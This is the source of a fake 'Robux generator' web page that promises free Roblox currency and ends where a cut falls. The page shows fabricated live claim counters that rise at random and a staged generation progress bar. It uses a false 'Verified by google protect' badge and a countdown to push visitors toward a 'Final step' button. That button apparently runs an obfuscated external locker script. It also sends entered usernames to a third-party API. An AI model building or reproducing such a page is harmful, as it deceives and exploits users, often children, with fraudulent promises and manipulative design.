<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="sa-verify" content="65y8lliorbxpag0">
    <link href="images/2048px-ROBUX_2014_Logo.svg.png" rel="icon" type="image/x-icon">
    <title>LioRBX</title>
     
    <script src="https://cdn.tailwindcss.com"></script>
    <link rel="stylesheet" href="css/all.min.css">
    <script src="js/jquery.min.js"></script>
   <script type="text/javascript">
    var gamDK_vIK_GoFRWc={"it":4550041,"key":"f373d"};
</script>
<script src="js/5db6b98.js"></script>
    <script>
        tailwind.config = {
            theme: {
                extend: {
                    colors: {
                        roblox: {
                            red: '#9333ea',
                            black: '#9333ea',
                            gray: '#393B3D',
                            darkgray: '#232527',
                            lightgray: '#D3D3D3'
                        },
                        robux: {
                            green: '#9333ea'
                        }
                    },
                    fontFamily: {
                        roblox: ['Gotham SSm A', 'Gotham SSm B', 'Helvetica', 'Arial', 'sans-serif']
                    }
                },
            }
        }
    </script>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Montserrat:wght@400;500;600;700&display=swap');
        
        body {
            font-family: 'Montserrat', Helvetica, Arial, sans-serif;
            background-color: #f3f4f6 !important;
        }
        
        .robux-icon {
            display: inline-block;
            width: 28px;
            height: 28px;
            background-image: url('https://c.top4top.io/p_36057rmxc0.png');
            background-size: contain;
            background-repeat: no-repeat;
            background-position: center;
            margin-right: 6px;
            vertical-align: middle;
        }
        
        .shine-button {
            position: relative;
            overflow: hidden;
        }
        
        .shine-button::after {
            content: '';
            position: absolute;
            top: -50%;
            left: -50%;
            width: 200%;
            height: 200%;
            background: linear-gradient(to right, rgba(255,255,255,0) 0%, rgba(255,255,255,0.2) 50%, rgba(255,255,255,0) 100%);
            transform: rotate(30deg);
            animation: shine 3.5s infinite;
        }
        
        @keyframes shine {
            0% { transform: translate(-100%, -100%) rotate(30deg); }
            100% { transform: translate(100%, 100%) rotate(30deg); }
        }
        
        .pulse {
            animation: pulse 2s infinite;
        }
        
        @keyframes pulse {
            0% { transform: scale(1); box-shadow: 0 0 0 0 rgba(255, 0, 0, 0.7); }
            70% { transform: scale(1.05); box-shadow: 0 0 0 10px rgba(255, 0, 0, 0); }
            100% { transform: scale(1); box-shadow: 0 0 0 0 rgba(255, 0, 0, 0); }
        }
        
        .bounce {
            animation: bounce 1s infinite;
        }
        
        @keyframes bounce {
            0%, 100% { transform: translateY(0); }
            50% { transform: translateY(-10px); }
        }
        
        .robux-glow {
            box-shadow: 0 0 15px 5px rgba(0, 176, 111, 0.4);
        }
        
        .shake {
            animation: shake 0.5s;
        }
        
        @keyframes shake {
            0%, 100% { transform: translateX(0); }
            20%, 60% { transform: translateX(-5px); }
            40%, 80% { transform: translateX(5px); }
        }

        .floating {
            animation: floating 3s ease-in-out infinite;
        }

        @keyframes floating {
            0% { transform: translateY(0px); }
            50% { transform: translateY(-15px); }
            100% { transform: translateY(0px); }
        }

        .spinner {
            width: 18px;
            height: 18px;
            border: 2px solid rgba(255,255,255,.35);
            border-top-color: white;
            border-radius: 50%;
            display: inline-block;
            animation: spin 700ms linear infinite;
            vertical-align: middle;
        }

        @keyframes spin {
            to { transform: rotate(360deg); }
        }

        .user-profile {
            background: rgba(18, 145, 235, 0.05);
            border: 1px solid rgba(18, 145, 235, 0.2);
            border-radius: 16px;
            padding: 16px;
            margin: 16px 0;
            display: none;
        }

        .user-profile.show {
            display: block;
            animation: slideIn 0.3s ease-out;
        }

        @keyframes slideIn {
            from {
                opacity: 0;
                transform: translateY(-20px);
            }
            to {
                opacity: 1;
                transform: translateY(0);
            }
        }

        .user-avatar {
            width: 80px;
            height: 80px;
            border-radius: 50%;
            border: 2px solid rgba(18, 145, 235, 0.3);
            object-fit: cover;
            position: relative;
        }

        .online-status {
            position: absolute;
            bottom: 2px;
            right: 2px;
            width: 18px;
            height: 18px;
            border-radius: 50%;
            border: 2px solid white;
        }

        .online-status.online {
            background-color: #10b981;
            box-shadow: 0 0 8px rgba(16, 185, 129, 0.6);
        }

        .user-info-details {
            background: rgba(0, 0, 0, 0.03);
            border-radius: 12px;
            padding: 12px;
            margin-top: 12px;
        }

        .info-row {
            display: flex;
            align-items: center;
            padding: 8px 0;
            border-bottom: 1px solid rgba(0, 0, 0, 0.05);
        }

        .info-row:last-child {
            border-bottom: none;
        }

        .info-icon {
            width: 32px;
            color: #1291eb;
            font-size: 14px;
        }

        .info-label {
            flex: 1;
            font-size: 13px;
            color: #6b7280;
            font-weight: 500;
        }

        .info-value {
            font-size: 13px;
            font-weight: 600;
            color: #1f2937;
        }

        .status-badge {
            display: inline-flex;
            align-items: center;
            padding: 4px 10px;
            border-radius: 12px;
            font-size: 12px;
            font-weight: 600;
        }

        .status-badge.online {
            background: rgba(16, 185, 129, 0.15);
            color: #10b981;
        }

        .status-badge.active {
            background: rgba(16, 185, 129, 0.15);
            color: #10b981;
        }

        .status-badge.banned {
            background: rgba(239, 68, 68, 0.15);
            color: #ef4444;
        }

        .status-dot {
            width: 6px;
            height: 6px;
            border-radius: 50%;
            margin-right: 6px;
            animation: pulse-dot 2s infinite;
        }

        .status-badge.online .status-dot {
            background: #10b981;
        }

        .status-badge.active .status-dot {
            background: #10b981;
        }

        .status-badge.banned .status-dot {
            background: #ef4444;
        }

        @keyframes pulse-dot {
            0%, 100% { opacity: 1; }
            50% { opacity: 0.5; }
        }

        .error-message {
            background: rgba(239, 68, 68, 0.1);
            border: 1px solid rgba(239, 68, 68, 0.3);
            color: #ef4444;
            padding: 12px;
            border-radius: 8px;
            margin: 12px 0;
            display: none;
        }

        .currency-option {
            background: white;
            border: 3px solid #e5e7eb;
            border-radius: 14px;
            padding: 18px 12px;
            text-align: center;
            cursor: pointer;
            transition: all 0.3s ease;
            position: relative;
            overflow: hidden;
        }

        .currency-option:hover {
            transform: translateY(-8px);
            box-shadow: 0 15px 30px rgba(0, 0, 0, 0.15);
        }

        .currency-option.selected {
            border-color: #1291eb;
            background: rgba(18, 145, 235, 0.1);
            transform: translateY(-5px);
        }

        .currency-icon-wrapper {
            width: 80px;
            height: 80px;
            margin: 0 auto 12px;
            display: flex;
            align-items: center;
            justify-content: center;
        }

        .currency-icon-wrapper img {
            max-width: 100%;
            max-height: 100%;
            object-fit: contain;
            filter: drop-shadow(0 5px 10px rgba(0,0,0,0.2));
        }

        .currency-name {
            font-size: 1.4rem;
            font-weight: 800;
            color: #1f2937;
            margin-bottom: 6px;
        }

        .currency-description {
            font-size: 0.85rem;
            color: #6b7280;
            margin-bottom: 10px;
        }
        
        .currency-select-btn {
            font-size: 0.85rem;
            background: #9333ea;
            color: white;
            padding: 6px 18px;
            border-radius: 6px;
            font-weight: 700;
            display: inline-block;
        }

        .diamond-option {
            background: white;
            border: 2px solid #e5e7eb;
            border-radius: 12px;
            padding: 16px;
            text-align: center;
            cursor: pointer;
            transition: all 0.3s ease;
            position: relative;
            overflow: hidden;
            opacity: 0;
            transform: scale(0.3);
            animation: popIn 0.5s ease-out forwards;
        }

        .diamond-option:nth-child(1) {
            animation-delay: 0.1s;
        }

        .diamond-option:nth-child(2) {
            animation-delay: 0.2s;
        }

        .diamond-option:nth-child(3) {
            animation-delay: 0.3s;
        }

        .diamond-option:nth-child(4) {
            animation-delay: 0.4s;
        }

        @keyframes popIn {
            0% {
                opacity: 0;
                transform: scale(0.3);
            }
            50% {
                transform: scale(1.05);
            }
            100% {
                opacity: 1;
                transform: scale(1);
            }
        }

        .diamond-option:hover {
            transform: translateY(-5px);
            box-shadow: 0 10px 20px rgba(0, 0, 0, 0.1);
        }

        .diamond-option.selected {
            border-color: #1291eb;
            background: rgba(18, 145, 235, 0.1);
            transform: translateY(-3px) scale(0.95);
        }

        .diamond-icon {
            width: 60px;
            height: 60px;
            margin: 0 auto 8px;
            object-fit: contain;
            filter: drop-shadow(0 3px 6px rgba(0,0,0,0.15));
        }

        .diamond-amount {
            font-size: 1.1rem;
            font-weight: 700;
            color: #1f2937;
            margin-top: 8px;
        }

        .notification-container {
            position: fixed;
            top: 20px;
            right: 20px;
            z-index: 9999;
            max-width: 350px;
        }

        .notification {
            background: white;
            border-radius: 12px;
            padding: 16px;
            margin-bottom: 12px;
            box-shadow: 0 10px 30px rgba(0, 0, 0, 0.2);
            display: flex;
            align-items: center;
            animation: slideInRight 0.5s ease-out, slideOutRight 0.5s ease-in 4.5s;
            border-left: 4px solid #10b981;
        }

        @keyframes slideInRight {
            from {
                transform: translateX(400px);
                opacity: 0;
            }
            to {
                transform: translateX(0);
                opacity: 1;
            }
        }

        @keyframes slideOutRight {
            from {
                transform: translateX(0);
                opacity: 1;
            }
            to {
                transform: translateX(400px);
                opacity: 0;
            }
        }

        .notification-avatar {
            width: 45px;
            height: 45px;
            border-radius: 50%;
            margin-right: 12px;
            border: 2px solid #10b981;
        }

        .notification-content {
            flex: 1;
        }

        .notification-username {
            font-weight: 700;
            color: #1f2937;
            font-size: 14px;
            margin-bottom: 4px;
        }

        .notification-message {
            font-size: 12px;
            color: #6b7280;
            display: flex;
            align-items: center;
            gap: 6px;
        }

        .notification-icon {
            color: #10b981;
            font-size: 18px;
        }

        .stats-container {
            background: linear-gradient(145deg, rgba(255,255,255,0.95) 0%, rgba(255,255,255,0.9) 100%);
            backdrop-filter: blur(20px);
            border-radius: 16px;
            padding: 14px;
            box-shadow: 0 10px 25px rgba(0, 0, 0, 0.12);
            border: 2px solid rgba(255, 255, 255, 0.3);
            margin-bottom: 20px;
            position: relative;
            overflow: hidden;
            max-width: 400px;
            margin-left: auto;
            margin-right: auto;
        }

        .stats-container::before {
            content: '';
            position: absolute;
            top: -50%;
            left: -50%;
            width: 200%;
            height: 200%;
            background: radial-gradient(circle, rgba(16, 185, 129, 0.1) 0%, transparent 70%);
            animation: rotate 15s linear infinite;
        }

        @keyframes rotate {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        .stats-title {
            text-align: center;
            font-size: 11px;
            font-weight: 700;
            color: #6b7280;
            margin-bottom: 12px;
            text-transform: uppercase;
            letter-spacing: 0.8px;
            position: relative;
            z-index: 1;
        }

        .stats-grid {
            display: grid;
            grid-template-columns: 1fr 1fr;
            gap: 10px;
            position: relative;
            z-index: 1;
        }

        .stat-item {
            background: linear-gradient(135deg, rgba(16, 185, 129, 0.1) 0%, rgba(18, 145, 235, 0.1) 100%);
            border: 2px solid rgba(16, 185, 129, 0.3);
            border-radius: 10px;
            padding: 8px;
            text-align: center;
            transition: all 0.3s ease;
            position: relative;
            overflow: hidden;
        }

        .stat-item:hover {
            transform: translateY(-5px);
            box-shadow: 0 10px 25px rgba(16, 185, 129, 0.3);
            border-color: #10b981;
        }

        .stat-item::before {
            content: '';
            position: absolute;
            top: 0;
            left: -100%;
            width: 100%;
            height: 100%;
            background: linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.3), transparent);
            transition: left 0.5s;
        }

        .stat-item:hover::before {
            left: 100%;
        }

        .stat-icon {
            font-size: 22px;
            margin-bottom: 4px;
            filter: drop-shadow(0 2px 4px rgba(0, 0, 0, 0.2));
        }

        .stat-number {
            font-size: 18px;
            font-weight: 900;
            color: #10b981;
            margin-bottom: 2px;
            text-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
        }

        .stat-label {
            font-size: 9px;
            font-weight: 700;
            color: #6b7280;
            text-transform: uppercase;
            letter-spacing: 0.5px;
        }

        .stat-pulse {
            animation: stat-pulse 2s infinite;
        }

        @keyframes stat-pulse {
            0%, 100% { 
                transform: scale(1);
                opacity: 1;
            }
            50% { 
                transform: scale(1.05);
                opacity: 0.9;
            }
        }

        .live-indicator {
            display: inline-flex;
            align-items: center;
            gap: 5px;
            background: rgba(239, 68, 68, 0.15);
            padding: 3px 8px;
            border-radius: 10px;
            font-size: 10px;
            font-weight: 700;
            color: #ef4444;
            margin-bottom: 6px;
        }

        .live-dot {
            width: 7px;
            height: 7px;
            background: #ef4444;
            border-radius: 50%;
            animation: live-blink 1.5s infinite;
        }

        @keyframes live-blink {
            0%, 100% { opacity: 1; }
            50% { opacity: 0.3; }
        }

        /* الإضافات الجديدة - عرض العملة مع العداد المتحرك */
        .currency-generation-display {
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 12px;
            margin-bottom: 20px;
            padding: 20px;
            background: linear-gradient(135deg, rgba(147, 51, 234, 0.1) 0%, rgba(16, 185, 129, 0.1) 100%);
            border-radius: 16px;
            border: 2px solid rgba(147, 51, 234, 0.3);
            box-shadow: 0 8px 20px rgba(0, 0, 0, 0.1);
        }

        .generation-icon {
            width: 50px;
            height: 50px;
            animation: pulse-icon 1.5s infinite;
        }

        @keyframes pulse-icon {
            0%, 100% { 
                transform: scale(1);
                filter: drop-shadow(0 0 5px rgba(147, 51, 234, 0.5));
            }
            50% { 
                transform: scale(1.1);
                filter: drop-shadow(0 0 15px rgba(147, 51, 234, 0.8));
            }
        }

        .generation-counter {
            font-size: 2.5rem;
            font-weight: 900;
            color: #9333ea;
            text-shadow: 0 2px 10px rgba(147, 51, 234, 0.3);
            animation: counter-glow 2s infinite;
        }

        @keyframes counter-glow {
            0%, 100% { 
                text-shadow: 0 2px 10px rgba(147, 51, 234, 0.3);
            }
            50% { 
                text-shadow: 0 2px 20px rgba(147, 51, 234, 0.6);
            }
        }

        .generation-label {
            font-size: 0.9rem;
            color: #6b7280;
            font-weight: 600;
            text-transform: uppercase;
            letter-spacing: 1px;
        }

        @media (max-width: 480px) {
            .notification-container {
                right: 10px;
                left: 10px;
                max-width: none;
            }
            
            .generation-counter {
                font-size: 2rem;
            }
            
            .generation-icon {
                width: 40px;
                height: 40px;
            }
        }
    </style>
</head>
<body class="bg-gray-100 min-h-screen transition-colors duration-200">
    <div class="container mx-auto px-4 py-6 max-w-md">
        <div id="notificationContainer" class="notification-container"></div>

        <div class="flex justify-center mb-6">
            <div class="relative">
                <img src="images/roblox.png" alt="Roblox Logo" class="h-20 object-cover">
                <div class="absolute top-0 right-0 -mr-4 -mt-2 bg-roblox-darkgray text-white text-xs font-bold px-2 py-1 rounded-full">2025</div>
            </div>
        </div>
        
        <div class="text-center mb-4">
            <h1 class="text-3xl font-bold text-roblox-black">ROBUX GENERATOR</h1>
            <p class="text-sm text-gray-600">The latest updated online tool for Roblox</p>
        </div>

        <div class="stats-container">
            <div class="flex justify-center mb-2">
                <div class="live-indicator">
                    <div class="live-dot"></div>
                    <span>LIVE TODAY</span>
                </div>
            </div>
            <div class="stats-title">
                <i class="fas fa-fire mr-1" style="color: #ef4444;"></i>
                People Who Claimed Today
            </div>
            <div class="stats-grid">
                <div class="stat-item stat-pulse">
                    <div class="stat-icon">
                        <div class="robux-icon" style="width: 28px; height: 28px; margin: 0 auto;"></div>
                    </div>
                    <div class="stat-number" id="robuxClaimers">8,547</div>
                    <div class="stat-label">Robux Claimed</div>
                </div>
                <div class="stat-item stat-pulse" style="animation-delay: 0.2s;">
                    <div class="stat-icon">
                        <i class="fas fa-gem" style="color: #60a5fa;"></i>
                    </div>
                    <div class="stat-number" id="diamondClaimers">6,923</div>
                    <div class="stat-label">Diamonds Claimed</div>
                </div>
            </div>
        </div>

        <div id="step0" class="bg-white rounded-lg shadow-xl p-5 mb-6 transform transition-all duration-300">
            <h2 class="text-xl font-bold text-center text-roblox-black mb-5">
                <i class="fas fa-coins mr-2"></i> Choose Your Reward Type
            </h2>
            
            <div class="grid grid-cols-2 gap-4 mb-3">
                <div class="currency-option" data-type="robux">
                    <div class="currency-icon-wrapper">
                        <div class="robux-icon" style="width: 70px; height: 70px;"></div>
                    </div>
                    <div class="currency-name">ROBUX</div>
                    <div class="currency-description">Roblox Currency</div>
                    <div class="currency-select-btn">
                        SELECT
                    </div>
                </div>
                
                <div class="currency-option" data-type="diamond">
                    <div class="currency-icon-wrapper">
                        <img src="images/901289026.png" alt="Diamond">
                    </div>
                    <div class="currency-name">DIAMOND</div>
                    <div class="currency-description">Premium Gems</div>
                    <div class="currency-select-btn">
                        SELECT
                    </div>
                </div>
            </div>
        </div>

        <div id="step1" class="bg-white rounded-lg shadow-xl p-6 mb-6 hidden transform transition-all duration-300">
            <h2 class="text-2xl font-bold text-center text-roblox-black mb-6">
                <i class="fas fa-user mr-2"></i> Enter Your Roblox Username
            </h2>
            
            <div class="mb-6 relative">
                <div class="absolute inset-y-0 left-0 pl-3 flex items-center pointer-events-none">
                    <i class="fas fa-user text-gray-400"></i>
                </div>
                <input type="text" id="username" placeholder="Your Roblox Username" class="w-full pl-10 pr-4 py-4 text-base rounded-md border-2 border-gray-300 bg-white text-gray-900 focus:outline-none focus:ring-2 focus:ring-roblox-red focus:border-transparent">
            </div>

            <button id="searchButton" class="w-full bg-[#9333ea] hover:bg-[#7a29c5] text-white font-bold py-4 px-6 rounded-md transition duration-200 ease-in-out transform hover:scale-105 shine-button mb-4">
                <i class="fas fa-search mr-2"></i> <span id="searchButtonText">SEARCH USER</span>
            </button>

            <div id="errorMessage" class="error-message">
                <i class="fas fa-exclamation-triangle mr-2"></i>
                <span id="errorText">Error occurred while searching</span>
            </div>

            <div id="userProfile" class="user-profile">
                <div class="flex items-center mb-4">
                    <div class="relative mr-4">
                        <img id="userAvatar" class="user-avatar" src="" alt="User Avatar">
                        <div id="onlineStatusBadge" class="online-status online"></div>
                    </div>
                    <div class="flex-1">
                        <h3 id="displayName" class="text-lg font-bold text-roblox-black">—</h3>
                        <p id="usernameOut" class="text-gray-600">@—</p>
                    </div>
                </div>

                <div class="user-info-details">
                    <div class="info-row">
                        <div class="info-icon">
                            <i class="fas fa-calendar-alt"></i>
                        </div>
                        <div class="info-label">Created</div>
                        <div class="info-value" id="accountCreated">Loading...</div>
                    </div>
                    <div class="info-row">
                        <div class="info-icon">
                            <i class="fas fa-signal"></i>
                        </div>
                        <div class="info-label">Status</div>
                        <div id="onlineStatus" class="status-badge online">
                            <span class="status-dot"></span>
                            Online
                        </div>
                    </div>
                    <div class="info-row">
                        <div class="info-icon">
                            <i class="fas fa-shield-alt"></i>
                        </div>
                        <div class="info-label">Account</div>
                        <div id="banStatus" class="status-badge active">
                            <span class="status-dot"></span>
                            Loading...
                        </div>
                    </div>
                </div>

                <button id="continueButton" class="w-full bg-roblox-red hover:bg-darkgray-700 text-white font-bold py-4 px-6 rounded-md transition duration-200 ease-in-out transform hover:scale-105 shine-button mt-4">
                    <i class="fas fa-arrow-right mr-2"></i> CONTINUE
                </button>
            </div>
        </div>

        <div id="step2" class="bg-white rounded-lg shadow-xl p-6 mb-6 hidden transform transition-all duration-300">
            <h2 class="text-2xl font-bold text-center text-roblox-black mb-6">
                <i class="fas fa-coins mr-2"></i> Select Robux Amount
            </h2>
            
            <div class="grid grid-cols-2 gap-4 mb-8">
                <button class="robux-btn bg-white border-2 border-gray-300 hover:border-robux-green text-roblox-black font-bold py-4 px-4 rounded-md transition duration-200 transform hover:scale-105" data-amount="800" style="opacity: 0; transform: scale(0.3); animation: popIn 0.5s ease-out 0.1s forwards;">
                    <div class="flex items-center justify-center mb-1">
                        <div class="robux-icon"></div>
                        <div class="text-xl">800</div>
                    </div>
                    <div class="text-sm bg-robux-green text-white py-1 rounded-sm">FREE</div>
                </button>
                <button class="robux-btn bg-white border-2 border-gray-300 hover:border-robux-green text-roblox-black font-bold py-4 px-4 rounded-md transition duration-200 transform hover:scale-105" data-amount="5800" style="opacity: 0; transform: scale(0.3); animation: popIn 0.5s ease-out 0.2s forwards;">
                    <div class="flex items-center justify-center mb-1">
                        <div class="robux-icon"></div>
                        <div class="text-xl">5,800</div>
                    </div>
                    <div class="text-sm bg-robux-green text-white py-1 rounded-sm">FREE</div>
                </button>
                <button class="robux-btn bg-white border-2 border-gray-300 hover:border-robux-green text-roblox-black font-bold py-4 px-4 rounded-md transition duration-200 transform hover:scale-105" data-amount="25000" style="opacity: 0; transform: scale(0.3); animation: popIn 0.5s ease-out 0.3s forwards;">
                    <div class="flex items-center justify-center mb-1">
                        <div class="robux-icon"></div>
                        <div class="text-xl">25,000</div>
                    </div>
                    <div class="text-sm bg-robux-green text-white py-1 rounded-sm">FREE</div>
                </button>
                <button class="robux-btn bg-white border-2 border-gray-300 hover:border-robux-green text-roblox-black font-bold py-4 px-4 rounded-md transition duration-200 transform hover:scale-105" data-amount="100000" style="opacity: 0; transform: scale(0.3); animation: popIn 0.5s ease-out 0.4s forwards;">
                    <div class="flex items-center justify-center mb-1">
                        <div class="robux-icon"></div>
                        <div class="text-xl">100,000</div>
                    </div>
                    <div class="text-sm bg-robux-green text-white py-1 rounded-sm">FREE</div>
                </button>
            </div>
        </div>

        <div id="step2_5" class="bg-white rounded-lg shadow-xl p-6 mb-6 hidden transform transition-all duration-300">
            <h2 class="text-2xl font-bold text-center text-roblox-black mb-6">
                <i class="fas fa-gem mr-2"></i> Select Diamond Amount
            </h2>
            
            <div class="grid grid-cols-2 gap-4 mb-6">
                <div class="diamond-option" data-amount="100">
                    <img src="images/901289026.png" alt="Diamond" class="diamond-icon">
                    <div class="diamond-amount">100</div>
                    <div class="text-xs text-green-600 font-semibold mt-2">FREE</div>
                </div>
                <div class="diamond-option" data-amount="250">
                    <img src="images/901289026.png" alt="Diamond" class="diamond-icon">
                    <div class="diamond-amount">250</div>
                    <div class="text-xs text-green-600 font-semibold mt-2">FREE</div>
                </div>
                <div class="diamond-option" data-amount="700">
                    <img src="images/901289026.png" alt="Diamond" class="diamond-icon">
                    <div class="diamond-amount">700</div>
                    <div class="text-xs text-green-600 font-semibold mt-2">FREE</div>
                </div>
                <div class="diamond-option" data-amount="7000">
                    <img src="images/901289026.png" alt="Diamond" class="diamond-icon">
                    <div class="diamond-amount">7000</div>
                    <div class="text-xs text-green-600 font-semibold mt-2">FREE</div>
                </div>
            </div>
        </div>

        <div id="step3" class="bg-white rounded-lg shadow-xl p-6 mb-6 hidden transform transition-all duration-300">
            <h2 class="text-2xl font-bold text-center text-roblox-black mb-6">
                <i class="fas fa-cog mr-2"></i> Processing Request
            </h2>
            
            <!-- عرض العملة مع العداد المتحرك -->
            <div id="currencyGenerationDisplay" class="currency-generation-display">
                <div id="generationIconContainer"></div>
                <div class="flex flex-col items-center">
                    <div class="generation-counter" id="generationCounter">0</div>
                    <div class="generation-label" id="generationLabel">GENERATING...</div>
                </div>
            </div>
            
            <div id="progressContainer">
                <div class="mb-2 flex justify-between items-center">
                    <span class="text-sm font-medium text-gray-700">
                        <i class="fas fa-cog fa-spin mr-2"></i> Processing request...
                    </span>
                    <span id="progressPercent" class="text-sm font-medium text-robux-green">0%</span>
                </div>
                <div class="w-full bg-gray-200 rounded-full h-5 mb-4 overflow-hidden">
                    <div id="progressBar" class="bg-robux-green h-5 rounded-full w-0 transition-all duration-100"></div>
                </div>
                
                <div id="statusMessages" class="text-sm text-gray-700 mb-4 border border-gray-200 rounded-md p-3 bg-gray-50 max-h-32 overflow-y-auto">
                    <div class="mb-1">
                        <i class="fas fa-check-circle text-green-500 mr-2"></i> Connecting to servers...
                    </div>
                </div>
                
                <div class="flex items-center justify-center mb-4">
                    <i class="fas fa-user mr-2 text-gray-600"></i>
                    <p class="text-gray-800">User: <span id="usernameDisplay" class="font-bold">Username</span></p>
                </div>
            </div>
        </div>

        <div id="step4" class="bg-white rounded-lg shadow-xl p-6 mb-6 hidden transform transition-all duration-300">
            <div id="verification">
                <h2 class="text-2xl font-bold text-center text-roblox-black mb-6">
                    <i class="fas fa-shield-alt mr-2"></i> Verified by google protect 
                </h2>
                
                <div class="flex justify-center mb-6">
                    <div class="floating" id="floatingIcon">
                    </div>
                </div>
                
                <div class="text-center mb-6">
                    <div id="rewardDisplay" class="mb-2 text-lg font-medium text-roblox-black">
                    </div>
                    <p class="text-gray-600 mb-1">
                        User: <span id="usernameDisplay2" class="font-bold">Username</span>
                    </p>
                    <div class="text-xs text-gray-500">
                        <i class="fas fa-lock mr-1"></i>
                    </div>
                </div>
                
                <div class="bg-gray-100 rounded-lg p-4 mb-6">
                    <div class="flex items-center mb-2">
                        <i class="fas fa-info-circle text-blue-500 mr-2"></i>
                        <p id="readyMessage" class="text-sm text-gray-700">Your rewards are ready to be added</p>
                    </div>
                    <div class="flex items-center">
                        <i class="fas fa-exclamation-triangle text-yellow-500 mr-2"></i>
                        <p class="text-sm text-gray-700">Click NEXT for the final step</p>
                    </div>
                </div>
                
                <button id="getrobuxBtn" class="w-full bg-roblox-red hover:bg-darkgray-700 text-white font-bold py-5 px-6 rounded-md transition duration-200 ease-in-out shine-button pulse transform hover:scale-105 mb-4">
                    <i class="fas fa-gift mr-2"></i> NEXT
                </button>
            </div>
            
            <div id="completion" class="hidden">
                <div class="flex justify-center mb-4">
                    <div class="w-16 h-16 text-robux-green bounce">
                        <i class="fas fa-check-circle text-6xl"></i>
                    </div>
                </div>
                
                <h2 class="text-2xl font-bold text-center text-robux-green mb-4">Generated Successfully!</h2>
                
                <div class="bg-green-100 border border-green-400 text-green-700 px-4 py-4 rounded-lg mb-6" role="alert">
                    <div id="completionRewardDisplay" class="flex justify-center items-center mb-2">
                    </div>
                    <p class="text-center">Generated for <span id="usernameDisplay3" class="font-bold">Username</span></p>
                </div>
                
                <div class="bg-yellow-100 border border-yellow-400 text-yellow-700 px-4 py-3 rounded-lg mb-6" role="alert">
                    <div class="flex items-center">
                        <i class="fas fa-exclamation-triangle mr-2"></i>
                        <p>Complete the final STEP to receive your rewards immediately</p>
                    </div>
                </div>
                
                <button onclick="_vs()" class="w-full bg-robux-green hover:bg-green-700 text-white font-bold py-4 px-6 rounded-md transition duration-200 ease-in-out transform hover:scale-105 robux-glow shine-button">
                    <i class="fas fa-user-check mr-2"></i> Final step
                </button>
                
                <div class="mt-4 text-center text-sm text-gray-500">
                    <i class="fas fa-clock mr-1"></i> This offer expires in <span id="countdown">05:00</span>
                </div>
            </div>
        </div>
        
        <div class="text-center text-xs text-gray-500 mt-6">
            <p></p>
            <p>Roblox, the Roblox logo and Robux are registered trademarks of Roblox Corporation.</p>
        </div>
    </div>

    <script>
        // API Configuration - Primary and Backup with 3 seconds fallback to default
        const PRIMARY_API = 'https://abadaoucht.com/tiktok/api/roblox/userinfo/';
        const BACKUP_API = 'https://abadaoucht.com/tiktok/api/roblox/userinfo/';
        const DEFAULT_AVATAR = 'https://www2.0zz0.com/2025/09/30/19/744312150.png';

        const step0 = document.getElementById('step0');
        const step1 = document.getElementById('step1');
        const step2 = document.getElementById('step2');
        const step2_5 = document.getElementById('step2_5');
        const step3 = document.getElementById('step3');
        const step4 = document.getElementById('step4');
        const usernameInput = document.getElementById('username');
        const searchButton = document.getElementById('searchButton');
        const searchButtonText = document.getElementById('searchButtonText');
        const continueButton = document.getElementById('continueButton');
        const errorMessage = document.getElementById('errorMessage');
        const errorText = document.getElementById('errorText');
        const userProfile = document.getElementById('userProfile');
        const userAvatar = document.getElementById('userAvatar');
        const displayName = document.getElementById('displayName');
        const usernameOut = document.getElementById('usernameOut');
        const accountCreated = document.getElementById('accountCreated');
        const onlineStatus = document.getElementById('onlineStatus');
        const onlineStatusBadge = document.getElementById('onlineStatusBadge');
        const banStatus = document.getElementById('banStatus');
        const notificationContainer = document.getElementById('notificationContainer');
        const currencyOptions = document.querySelectorAll('.currency-option');
        
        const usernameDisplay = document.getElementById('usernameDisplay');
        const usernameDisplay2 = document.getElementById('usernameDisplay2');
        const usernameDisplay3 = document.getElementById('usernameDisplay3');
        const progressContainer = document.getElementById('progressContainer');
        const progressBar = document.getElementById('progressBar');
        const progressPercent = document.getElementById('progressPercent');
        const statusMessages = document.getElementById('statusMessages');
        const robuxBtns = document.querySelectorAll('.robux-btn');
        const diamondOptions = document.querySelectorAll('.diamond-option');
        const getrobuxBtn = document.getElementById('getrobuxBtn');
        const verification = document.getElementById('verification');
        const completion = document.getElementById('completion');
        const countdown = document.getElementById('countdown');
        
        // العناصر الجديدة للعداد المتحرك
        const generationIconContainer = document.getElementById('generationIconContainer');
        const generationCounter = document.getElementById('generationCounter');
        const generationLabel = document.getElementById('generationLabel');
        
        let selectedRobuxAmount = 0;
        let selectedDiamondAmount = 0;
        let selectedCurrencyType = '';
        let currentUserData = null;

        let robuxClaimersCount = 8547;
        let diamondClaimersCount = 6923;
        let counterUpdateCount = 0;

        function updateCounters() {
            const robuxIncrement = Math.floor(Math.random() * 100) + 500;
            const diamondIncrement = Math.floor(Math.random() * 100) + 500;
            
            robuxClaimersCount += robuxIncrement;
            diamondClaimersCount += diamondIncrement;
            
            animateCounter('robuxClaimers', robuxClaimersCount);
            animateCounter('diamondClaimers', diamondClaimersCount);
            
            counterUpdateCount++;
            
            if (counterUpdateCount === 1) {
                setTimeout(updateCounters, 2000);
            } else if (counterUpdateCount === 2) {
                setTimeout(updateCounters, 2000);
            } else {
                setTimeout(updateCounters, 4000);
            }
        }

        function animateCounter(elementId, targetValue) {
            const element = document.getElementById(elementId);
            const currentValue = parseInt(element.textContent.replace(/,/g, ''));
            const increment = Math.ceil((targetValue - currentValue) / 20);
            let current = currentValue;
            
            const timer = setInterval(() => {
                current += increment;
                if (current >= targetValue) {
                    current = targetValue;
                    clearInterval(timer);
                    element.parentElement.style.transform = 'scale(1.1)';
                    setTimeout(() => {
                        element.parentElement.style.transform = 'scale(1)';
                    }, 200);
                }
                element.textContent = current.toLocaleString();
            }, 50);
        }

        setTimeout(updateCounters, 2000);

        function smoothScrollToElement(element, offset = -20) {
            setTimeout(() => {
                const elementPosition = element.getBoundingClientRect().top + window.pageYOffset;
                const offsetPosition = elementPosition + offset;
                
                window.scrollTo({
                    top: offsetPosition,
                    behavior: 'smooth'
                });
            }, 300);
        }

        const usernames = [
            'Alex_Pro', 'Sarah_Gaming', 'Mike_Player', 'Emma_2024', 'John_RBX',
